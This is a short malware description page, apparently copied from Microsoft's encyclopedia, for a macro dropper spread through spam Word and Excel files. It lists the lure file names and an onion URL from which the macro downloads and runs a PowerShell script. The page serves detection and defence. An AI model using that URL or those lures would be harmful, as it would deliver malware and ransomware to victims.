Home / malware TrojanDropper:O97M/Poshkod.gen!A
First posted on 30 April 2014.
Source: MicrosoftAliases :
There are no other names known for TrojanDropper:O97M/Poshkod.gen!A.
Explanation :
Threat behavior
TrojanDropper:O97M/Poshkod.gen!A is a generic detection for malicious macros. They run when a Microsoft Word document or Microsoft Excel spreadsheet is opened and Visual Basic for Applications (VBA) macros are enabled on your PC.
We have seen these threats attached to spam emails as a .doc or .xlsx file with one of the following file names:
- Round 1 match report.docm
- Um-Hazaa List.xls
- U11 Comets Round 1.docm
- 2014 U11 AJAX Commets Sign in Sheet.xls
- 2014 - Doc#10 - AJAX - U11 Commets Round 1 Match Report.docm
- 2014 - Doc_10 - AJAX - Template - Match Report (example).doc
TrojanDropper:O97M/Poshkod.gen!A downloads and runs a malicious PowerShell script from the following URL:
- http://powerwormjqj42hu.onion/get.php?s=setup&mom=4C4C4544-0050-3010-804C-B4C04F4C5131&uid=
The malicious script is invoked and might not be written to disk. It can perform a number of actions of an attackers choice and can change at any time. We have seen it downloading ransomware.
Analysis by Jireh Sanico
Symptoms
The following could indicate that you have this threat on your PC:
- You have these files:
Round 1 match report.docm
Um-Hazaa List.xls
U11 Comets Round 1.docm
2014 U11 AJAX Commets Sign in Sheet.xls
2014 - Doc#10 - AJAX - U11 Commets Round 1 Match Report.docm
2014 - Doc_10 - AJAX - Template - Match Report (example).docLast update 30 April 2014
